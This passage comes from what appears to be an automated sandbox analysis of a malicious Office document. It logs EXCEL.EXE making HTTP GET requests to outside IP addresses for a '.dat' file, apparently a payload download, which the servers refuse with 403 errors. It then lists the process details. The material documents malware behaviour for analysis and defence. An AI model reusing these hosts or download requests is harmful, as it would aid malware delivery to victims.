        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 185.45.193.80
        Connection: Keep-Alive
        May 4, 2021 06:08:13.109989882 CEST  1                   IN         HTTP/1.1 403 Forbidden
        Server: nginx
        Date: Tue, 04 May 2021 04:08:13 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: keep-alive
        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


        Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
        1           192.168.2.22  49170        45.144.31.232   80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Timestamp                            kBytes transferred  Direction  Data
        May 4, 2021 06:08:55.354362965 CEST  2                   OUT        GET /44313,6048108796.dat HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 45.144.31.232
        Connection: Keep-Alive
        May 4, 2021 06:08:55.449466944 CEST  3                   IN         HTTP/1.1 403 Forbidden
        Server: nginx
        Date: Tue, 04 May 2021 04:08:55 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: keep-alive
        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


        Code Manipulations

        Statistics

        System Behavior

        General

        Start time:06:07:45
        Start date:04/05/2021
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Imagebase:0x13f330000
        File size:27641504 bytes
        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Disassembly
